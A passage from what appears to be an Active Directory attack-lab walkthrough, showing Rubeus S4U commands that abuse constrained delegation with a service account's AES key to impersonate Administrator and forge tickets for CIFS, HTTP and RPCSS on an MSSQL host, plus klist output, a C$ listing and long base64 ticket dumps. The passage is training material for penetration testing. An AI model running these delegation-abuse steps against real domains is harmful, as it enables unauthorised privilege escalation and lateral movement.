7MnJmH032EJtQqxu6RKvZ69ih4uOvkS3bKoTazhvJNmFlBpC8dAytV5J1/FbM7tOnLiEmNa0JmN01rJl
sZkeRaTXmNSB2jG6kzv3rgeDreDlQPfzBTEf1370yhxR1Pc5odrKtSdcbW5lc+NZ++QKtCWqVwe9pvSa
nxG7AlE33S8I/8g/M2Xg0YeivSrGRwkWQAmJEmyxVcF7yULjp+wMKsJPa8C/6xTX1/+IY4UfH+S8etT1
8hQfafg6gFgVag4i7nSwOWQRAAFB9NGehOgYrksxypFMof66KW0KXnymawrh6A8i/4XqEyfq6vZ1ACAq
s9rPLvl5tU8K1t5++CP/cmbW77kLPjQTkLgeQXcmHi6g4hNyEExv7FwEKv94W7bDjCVAD3aKxHpACZNW
AxjxmzYCvybthKOCARIwggEOoAMCAQCiggEFBIIBAX2B/jCB+6CB+DCB9TCB8qAbMBmgAwIBEaESBBDl
mnnmfAwZ4bZ4QthFuHfYoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEKoREwDxsN
QWRtaW5pc3RyYXRvcqMHAwUAQKEAAKURGA8yMDI0MDcwMzE1MzMzOVqmERgPMjAyNDA3MDQwMTMzMzha
pxEYDzIwMjQwNzEwMTUzMzM4WqgcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKk5MDegAwIBAqEw
MC4bBENJRlMbJmRjb3JwLW1zc3FsLmRvbGxhcmNvcnAubW9uZXljb3JwLkxPQ0FM
[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x847a8

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/3/2024 8:33:39 (local)
End Time: 7/3/2024 18:33:38 (local)
Renew Time: 7/10/2024 8:33:38 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.LOCAL\C$\
Volume in drive \\dcorp-mssql.dollarcorp.moneycorp.LOCAL\C$ has no label.
Volume Serial Number is 76D3-EB93

Directory of \\dcorp-mssql.dollarcorp.moneycorp.LOCAL\C$

05/08/2021 01:15 AM <DIR> PerfLogs

11/14/2022 05:44 AM <DIR> Program Files
11/14/2022 05:43 AM <DIR> Program Files (x86)
12/03/2023 07:36 AM <DIR> Transcripts
11/15/2022 02:48 AM <DIR> Users
01/10/2024 03:17 AM <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 3,780,669,440 bytes free

Moreover, we won't only have access to the service that the user is able to impersonate, but also to any
service because the SPN (the service name requested) is not being checked, only privileges. Therefore, if
you have access to CIFS service you can also have access to HOST service using /altservice flag in Rubeus.

We will use the /altservice flag in Rubeus to generate TGS for the host, http and rpcss services. Once we
get the required TGS we will access the machine dcorp-mssql.dollarcorp.moneycorp.LOCAL using
PowerShell Remoting.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe s4u /user:websvc
/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
/impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL
/altservice:http /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash:

2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF5jCCBeKgAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BFswggRXoAMCARKhAwIBAqKCBEkEggRFAMfQd5EJnxCkmcPaAkuVQCBEo2/PzSMnpmvOcdCkqEB11rzz
UudA0RoEs2A8Jsiew/bh7G5BHIAiAsjLMEhI6njE3qtODpqNhovUrX7fjg+7Y0CtfSk4ckb+7CYIdlWu
wpbRM3t8lbI3Rnx0BaNxhRinCA5IZG328TNXF31drSBvslZg1SuHJoAUUSuLjKadzKUBfaJpFsZNF3Zi
z231jJlXEKkSzuS/HsTSLSc7YO8Gm8gsjFwHeuO7H45U6aiZ7bjCoo+9IDMPV9UqKMjN04KYHuenaYvq
+6NF9uE4E9zK1Hy+9KJIJ8MNyJx154dmqWToks1JjgiDR+mir7AC9BRvXbGlPLKoBIOIW2YQFDMJN8HA
9BcACysIPhlOYJb/eG2HLfPLAPzK0Kjsa3R4nc+ptaOmuMNshARnEaZyQ/WUCz0xDx54OA/n7Ngr/r66
6vLhLEaUSBaHYmJNaUYlIQH3vaZLgDLUaMV+OYd1tbK7cM0rbE8bqq1sUITdbTtXXH4He1Ts2uI/uQAD
haMOre8aBIW9FffwnsNTzxYJUjNJCWWyLzTGlSjT0ur+o68KZyHoJnDYENbeDBOYbbrCdQiI2nDQttg7
cuc683+lQwoy5xtr4iK2Suvs/paSEAxL4YBR8ZmGU/P9Xv+Bk7Z+xmfPJz41esNNLDUNdJG5OBsFUdLk
m/mAQH0q98MdSMhJRjLdyqVMlRRiGr9o9JsTlZ9I7Ia15u4emlMy2DLnP6CQB2TrtCwheZ5h86rDnSqA
b6j72l/5M2O82YH2HgoYSoSXyTScC/GYevS4N8ffK52yNNC7/pTZ+knuPWQCcvMLC/cjjD/W/KrWX67O
GCBV0gv+8Gga4XpNz49Qm6g/188C7h0efvFk8PbHX2NT3nbospjjbk8/H+nzO7GmIm0figJx5lQ5JDtX
sRudw3q+/gM+Yt3/uEiZZkif7V3uLNtQgUtYj1e+1WgbDgqZW/6uxmv05XWSLFM57f42NTp9z45xCt6g
BeOkECH5guSI0QcM+GeKVGr+qFb6Ncw9fMjAfbFVrv5J7z+yG5Wo3OyFGj+DN9k5TDqTy/MeeT7WeLyc
y+wSan7ebXW2iqh3MqwJO/HlKtWXNC0idetPfxm2KlSdv+dM5qc1jYpGvmTAtE5y7v3nR7cwL6XesWWf
+1oEY6XMZVeysuzIdphKqG6/nzP4WP2RhPjlTpqwciOsO4NdIzGdYN639obKMo3FDm7769dWVEfnZEYr
c8P9nQUcMZPPvFlhWFaBRAAehGu1xSnmuNnLEluSywVHQnT3tjSRdo4zfCbotsC4gtVz5iLSy99HjvmQ
J9jbVwOkJ4ywVEahfEdJ9j2qOY4umvfJDeCpgUBcDq3tTMwjtdGpY8jU7abDXy/0aPsJbuonQ3shLN8Z
jbM+sgFEeden/uH4HmIh1FTN2NS8xEB9D3IJNV9sMjGR61a8G6OCAREwggENoAMCAQCiggEEBIIBAH2B
/TCB+qCB9zCB9DCB8aArMCmgAwIBEqEiBCB4aprMuOUJ/nRBXrQ2XtmgViSczcw/xLcZYnNSbcTSeKEc
GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKITMBGgAwIBAaEKMAgbBndlYnN2Y6MHAwUAQOEAAKUR
GA8yMDI0MDcwMzE2MTc1OVqmERgPMjAyNDA3MDQwMjE3NTlapxEYDzIwMjQwNzEwMTYxNzU5WqgcGxpE
T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaZG9sbGFyY29ycC5t
b25leWNvcnAubG9jYWw=

[*] Action: S4U

[*] Building S4U2self request for: '[email protected]'

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi):

doIGTDCCBkigAwIBBaEDAgEWooIFPjCCBTphggU2MIIFMqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
 T1JQLkxPQ0FMohMwEaADAgEBoQowCBsGd2Vic3Zjo4IE9jCCBPKgAwIBF6EDAgECooIE5ASCBOC4kuQT
BuEx7ZzAAiwKhSauDsR+US9Y9zpIvGTluAJIKYT1rAnaJzqniLwQXqWIgIyNrrVCdC3MdQ4HwpxyYALe
p6hJmMZdGLRH7ja5ZU2A471ZxV1m4LEQmu1r4aIHTXIe56Lub1u6xlDtu0FUClxWXSfBYF1yiBZN4d3o
U5xaXuZL1FSOY+/y5tP4xoDb6ENHL7twT/knZDYJMiOTEed/KzCSD1vmSB+hhD7yXVK3Yf9qY7lzyZ45
qIDkBA79VigKzHn4cbgLYgyAkAzl/fBm0XZln/AqKDRHRamF2UizNTEBCeLN6Jh0tyBF14mej3rGM5qO
271oNe3oxoDJGzjideX7vr4oN9aq4yWN54TASQ7jUkvPiBd+ijL1JcKW9eaC9Ox3k5OL/WexOLrEkSk4
SSSeU5mAor1W5h+I0IHdHSQXcajzpD29g/rl9M3qiQFaZc3hOS+4nCL0ER7DJ/mKyf2u4D8aoCh2nZkK
qyJ2YquXHp9cM2AGw/xU6ZYlhY1efns93/u0RhlpwMC6UpestmtpKKrwFIuKPr1e1Yv4uY6cMd+Kf4nC
yEOlRsePPH4UIeP/O/cCFL7g3EOgkVsVPn3hKf9FhG0ZzgHD6wRsGO5FdM8ySz6/h5yuZCEokjBEcVgr
kO9+AmObBv0qlzDl+q3GeF++jDAidm884CzI9T//FgOKxY4RZK5FU9dgkxikrS18gJSoYiw6z1zXXNhf
vecLBOr9gSeemxeza58qbaTEcw47TnuWecXqUsinF+Rlawv+vTntiAvEc3rOGh0/BezsnhnUxKnCcc9p
/K+PI04X5GK8h67d32ptPET9k54Tw9QDYeLVY/I7Jv6wr5vKPuy7KKuW41iYt7DtTKeMUHT14GpxJaq1
s7Y/ThLpTYBVxNbFIwlbYShB/b407lkh1RdyRRlwyS1fRcF54I4s40FxHBEsERnhEs3qUCL5E6Xtk83c
Cxq9kFBOTMvQuf0BDLX3DlrlPoef8LIEuUi7o+FGk29kij2r6O7Ko7iX9sy2Ub0tiaOYnSCx8tPWNL50
qNdLHqfexHFEG5PxI2ATycgcGp3XdNrQY3fo1+m38WmHpTMhkuyQrw2tnyy2z17AM1D6o0SngJqJx7oQ
zTvn5SQ/zsTXBw74Gzx4IaOU2ptNZJtheZ2ogw9kNwzDjOCShiLxTq2zcM4sREO5ku33garDNg2u59Cd
LN1w4gf8FY0/nbAQf6WrIUaEbf4vgVWGfjfJVg7aZv3RlD+/Yo+x4dvXsBMOyi60ruzNJT0IZntefjHM
y3C3dB6ENXGrPBQJia099ChmOYwUYrnJOiYI9UpoOQLKn8MaE4/FHafqosr8IrdxUpbmfSuvwdG3P7iR
DmsccwL4ebN5BFxnSVqD2AojgORSyHc+E7t6vupmHZwDrr0QZL/eF9DbUZMMK8KBtz0XYDAnsHsofg4B
B6iBtB+IaqPnH0FHnKrDgdXFQKDXeung0o7lBWkUVqYp2xS04+IlgrLFAlVL2Y3c4hi5dTnuCWXvKmLb
nlljGrdaWfe3A88cofkcIkJXdiwnKuHGQIpaJIeM1XKZkFHg+CMr+gNeDtB8R7UJvPE0Uw/8J91relli
FoV42Apyw4KS1ZO0FCSDNUq8PQmS1PfcYuS/QLFvPtY8GUkMAxD5ZaeHhQCjgfkwgfagAwIBAKKB7gSB
632B6DCB5aCB4jCB3zCB3KArMCmgAwIBEqEiBCD5u/j0mK39hSKQrRU6axdyUtYCYSXh0pqIEUvxLotz
j6EcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3Kj
BwMFAEChAAClERgPMjAyNDA3MDMxNjE3NTlaphEYDzIwMjQwNzA0MDIxNzU5WqcRGA8yMDI0MDcxMDE2
MTc1OVqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypEzARoAMCAQGhCjAIGwZ3ZWJzdmM=

[*] Impersonating user 'Administrator' to target SPN 'CIFS/dcorp-

mssql.dollarcorp.moneycorp.LOCAL'
[*] Final ticket will be for the alternate service 'http'
[*] Building S4U2proxy request for service: 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'http'
[*] base64(ticket.kirbi) for SPN 'http/dcorp-mssql.dollarcorp.moneycorp.LOCAL':

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
[+] Ticket successfully imported!

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe s4u /user:websvc

/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
/impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL
/altservice:rpcss /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash:

2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF5jCCBeKgAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BFswggRXoAMCARKhAwIBAqKCBEkEggRFE0OWSw3P0mcDk5VEpL+gNMdgwCySS8PbVNgvxE/l/AeSUyRR
VkY9jI9hpFdp7qe4sqTNE9BrsA5p9l12Vvp5fhs1gTosjqG3u3Bu3/V9oTOKI0TkRqg5nu8piBGXYNhJ
70OU2wtNpe2ItOF/9U/HQTfhGOGwj72E4AVJInl+HsaiU5tx3iY69rnFaamW7ENwTj5gSOEhHZtCse2u
wKatdgVOs4Llk1kNI0rgB7AxtQ6jicHx9lU0E0w9UJwHrRf8tQv4xx+hKOYYDZH3c85omT/DYtjjwKHM
atvtk87E48QFslOcXWtmrF3Y7ow2BjAscDPDOSj/2kNRTY/19ptWs70UxAoIUk3WjaPMl+9zlNDosFcL
wIxF47rztnDfREReqJ9fL4DDkQF5tyO8XE3naWh47JcUVAGyGgmm6v/S47ool2/vqBnrilURf50UDkH0
qQP6YjiiECFxymij8jeCV9C3ahprg4Zs4FEcrrp49NQaHezox+Gyipmchx6qBwU9snBMi8fQPPBVo5Ly
yPnRIdbcX/iukFwhRvh3XuHdzonBCZX2AQfi11DQsdSy9Te32U8IbBjvYVrcU7Qy+KvHsI71dSg5055L
1gsCEQAyaLJia8cnI3bGeb+QxQGwkPwpiTGe+WrgPQF+l4XRPdXP7DQ73ErCvCXE4rlZR+poWElireOD
CawsYGgdc3HdjmS0K/kd3+/2n2zl/RSshb7M2zy2jQU8tru2PZ4R0tI1A0ANBs4B7RDCqYyTWhedXcVn
8yeEW0+CGEpA5zExwNFCsH1TgBN6Fcaa0qY8GqjxcZkmo3jHu7bsEW/zOLu/+asoCPWzxk4PQ+oezE2c
wFfmsWOoz7EkkosHbP885Rbg2IjWM1AJw0TCoOBYWkkD0qAZP1bpt2Bfq/bwOSFuTIzGQFNF4Qiwp8XB
DMX3H/GPB/IwD7HyL3JgC8TF1gciAxpFGq+SFUbwIkifhrqX7u6a7cd90/Ot0CgTypUMceVi0U2gIQmZ
5vUZ7fiKgAKKhMHkRk7Mw1e4F8VX0JWn+GxMQMuT6nAo88X/YiA4nUk9Gto3kGJiFM5hUPhBQQAj2JY8
Q64NOPGoEvLeWr2SVamQSEYJ1TBlUIf4uss4jn9S1b5c3YPYFQLdVuZd8fSxUGIHuuWCvMgboTdUy66M
0ONKXwSnyvJsKsLIqSVZjgePF3v3HPJcHobqY6R+pmsfhfawuzC3/MZYxiVwBRFAKH6TLWc+NjXYa7aF
oOEdjdHOWGED6y7GajzcI1BIYeKFu2+C4sIEr12GSG5F0Nqqhcz8NYtdPAp8RAL+v6dCIyfkoZQ/HL13
4wm/8cupCPdbDrXG5dT01YPI+u54igHQ42IVF2B09UbJGbKvLix2OqHxENq0aWvtaVpPu6PhdFAup2+p
hqJHgGG/0Sqv8yKMBLy3VCNiWMwSR3UtCLZQ/ZQJKURMwwdluqOCAREwggENoAMCAQCiggEEBIIBAH2B
/TCB+qCB9zCB9DCB8aArMCmgAwIBEqEiBCCcxjaWpXFGvu3KFlcBjiKQxSwKj8Uabs0o4+HD4LAz/6Ec
GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKITMBGgAwIBAaEKMAgbBndlYnN2Y6MHAwUAQOEAAKUR
GA8yMDI0MDcwMzE2MTgwN1qmERgPMjAyNDA3MDQwMjE4MDdapxEYDzIwMjQwNzEwMTYxODA3WqgcGxpE
 T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaZG9sbGFyY29ycC5t
b25leWNvcnAubG9jYWw=

[*] Action: S4U

[*] Building S4U2self request for: '[email protected]'

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi):

doIGTDCCBkigAwIBBaEDAgEWooIFPjCCBTphggU2MIIFMqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMohMwEaADAgEBoQowCBsGd2Vic3Zjo4IE9jCCBPKgAwIBF6EDAgECooIE5ASCBOB2j3yU
l5qgZ2NxVjsfiY+sJpCeBsLsg7ZEDqQk/Pl7W/9ZpaN7BAitFJSDCOW2IxXSYheZR3zuDvwLHtQPi2PM
pWBZ/Zx62EKwvIY2QFP8h1EQg+6Pks2resejDpMGjlr65OvEXcTynB53JauY2+ZMs0M8Yuq220Z0WSnt
1iD9lnUaf5Lt4ww/U4QnZJuymFJq7/cqQUSjjsLizpj4/nBf51+Ie8sH+/4U0YRXbvqU+H6dGou+Yga5
RgEMjMlFFUK4O+s6euOU+CUR0MguF+s/evcjd+KvZHXbdQHKvlXdxiy4CKq6GcE9H7BAWO7AnMfOvI1R
lanJMiEEbTRZ4HmgbSmQJFgiF5r/j8DV75DnYpiSeQR2wVO4Cm4ojA0B7kFOOpKSbmne5YsHt45zv1mc
EouXSbbtH6BObgW3O0xRBU9Dn0x5g0eKXG+e1scuLBTYqMfVLpBOG0evYZH+bOgSchCl21qm6R9CE+Ed
J3lnnTI77SviX/Y674LqkM29fqtyz9iQ70oLxC3Mj465bjQhgHL0/ritzp97OPZ1TApwAlvwv++CVJou
Ps9beSD0Flj2GVZHufYX3okLxmN3S/g4I7uG8QqAYGKdYoUtvhDlSvHw+zTo3dnmlxv1MDTu8FpbOVxU
DrnzTqmt7ZAfApdfvk+9sNL0lIwVbRJHA7zT4sAuOlrVE7nG9yuvZiMyATAkl4KtkYnIrm9T6bCglBsX
Mzr3QjjrLr2hxsyCl4wZ5IDEwSKdJSEkKNBCOK+5Ye/faogXL8H2ySlZxQKiow7hy+weCnsvyU5Jhdhq
IX3Qlzu2dbFLitf88gyhEP5nq+T32JbNQt47Q78GePHaFYHRFIHvsdz1PMEEswEuh1x7sV2K41bLFfw+
xPd18wMgZLqtykYriaGaBtXoR5wsPkxWTW0S9JPK8XRL7aCPRwTuQCQq8QtlkMJWjGOojTKLf9mMo/Ig
KeVWnGfsYGEhPC7Y81YSq0aJpDdkZFzviEjhALM5TmZsFqcecH5JD+lAzpMBcX0FzK9zrP9jgvalRnxF
aXxtboODsRV2F6vAuXqFbJaIQlQB5octyHpdY7DL06RdqNXNQ4EmmuucmIjAqFtfIAVPk8YN3lusEHeP
JNO7ol7whQiBd4OZZLD6R7M+uglkPOQJXz/raYSlqrvtW1U2NZx5I3gLPSmcCnLFVh2SrHz4u9rXQz2m
ZsmdqfUwmxeXRjOFH128Y5oMZcuDxZAPCVcmVPFuTuB9SX+YBebe5V8Y4dPRC0X71Pa7Sj155O7zaQG2
9FBLCfF/n3hv8WzdL2Qv27zWXvdW7Ze1PNGyH9D1WY/7uEaiTwwG9Kg8DZOqBXaNJyYXa0au0vKLk4Yk
cOZB9WKPbQji6xBrJjpP/Rn1t8Avq0yAKOXf5ipH69bN5HAfHEorFLx5MEwN53H46vcDCBNHEL2BPE4d
yDOQr8SjBZpUPWsr5i46hn5U3SiqeaCsfodlqiSOd0tPsy6hRNQknBD2cr05ZHyc9YF9pgAaWBIIdcXc
pCjsq0x0dTRaVP1NhqYo2dAvyxIsRPVLkXJTWsKa5M4v3dUGqNTPFpQD07+VwSsuUjvaRoPzJwtWDvaS
YUpHRC0ecxAVcYGIFqr62/d5QUJcBHP278XT7tE5WqqoHKuWX71j+TDyFfWjgfkwgfagAwIBAKKB7gSB
632B6DCB5aCB4jCB3zCB3KArMCmgAwIBEqEiBCCLK9zxPtRO5KVHMZ07G0ZiWXjlru2oBp5l5141hYyg
J6EcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3Kj
BwMFAEChAAClERgPMjAyNDA3MDMxNjE4MDdaphEYDzIwMjQwNzA0MDIxODA3WqcRGA8yMDI0MDcxMDE2
MTgwN1qoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypEzARoAMCAQGhCjAIGwZ3ZWJzdmM=

[*] Impersonating user 'Administrator' to target SPN 'CIFS/dcorp-

mssql.dollarcorp.moneycorp.LOCAL'
[*] Final ticket will be for the alternate service 'rpcss'
[*] Building S4U2proxy request for service: 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'rpcss'
[*] base64(ticket.kirbi) for SPN 'rpcss/dcorp-mssql.dollarcorp.moneycorp.LOCAL':

doIHcjCCB26gAwIBBaEDAgEWooIGSTCCBkVhggZBMIIGPaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMojowOKADAgECoTEwLxsFcnBjc3MbJmRjb3JwLW1zc3FsLmRvbGxhcmNvcnAubW9uZXlj
b3JwLkxPQ0FMo4IF2jCCBdagAwIBEqEDAgEBooIFyASCBcTo3UH370WHJdiHXKFHpml1g9KtBq2l0xUU
S04EgWVjWtBImzjj10VvZlSO2fvAETetVqog8boL4jGnE83lnC0GgJMvXqbEFHNPEEea7F70ELcL5WR8
sAnWmHPMbk0VwR1LrpMWvk9xSWiM70YKPwgIu6tVKVnJ+agHxFRPyL+YhCDlyd/uKlH0o/n3la1TI4+c
UPrStfcTx53xL5KRtncY5Wm9IL8tdGkx5wNfP4sbP2XWQ0upfhpRpau4tiQcgvOQQ/pLPskVltbV9OOA
Z16fVcyMehgygUXKncyJJ3Z0qilAkjNhwRjzyB6gMYzt4NdlYbmXv7/dxaSxoUrWbq5G8u6sw6PKZWin
r8Nk8+Dthr2HvWte1opMdfGETOo7wNrUE3lhzJAMXbtPWY0EhzolkjqNBYFg1C3ZO0pP2O/ANpupayfL
 3F2hYSl6zD67Dy/rv/W7qYBFmgK+cPOVi4HI2p2jE5+ajv3tvhpz5xeAaxb88h0lV2WgR4heca2/fQmm
247ZVqN3GOVwdi5gYYgbJLaznVYi7+SZqqRoaLgMU8hsWRJl/Sq8Havydni6v4Dp7SeWE/Krt2QwrqBq
hr5uir1yNdZ+0w9HGaMDePkRk8mW44K52u2Mkfd7yvEKnqwlzcUXnLczlDqUarWAkueMtw3HZXIIhCsy
PtMs/jP2EOSbx61obJ6UFh/LrAoOwsp3f8+gHBELeV/jbcSrpPAC1vX5noa/EnDLnh3CpW3NZyjH48Ky
Ed/1gVPyPUdeIEfS0fgm7UnPMKB3dvCNE8yHLCRDMW++Vxitmi4YGl0xhxoAd6cUj1B7pG7pogo7lnsS
fsm1ZfGj1/vuY+NRms7/FDIcUpKiJoXcAiPsYFWP0PkUJvpXCH0rKjfyAfE1ROqqhZXdvx18IhTkMBLF
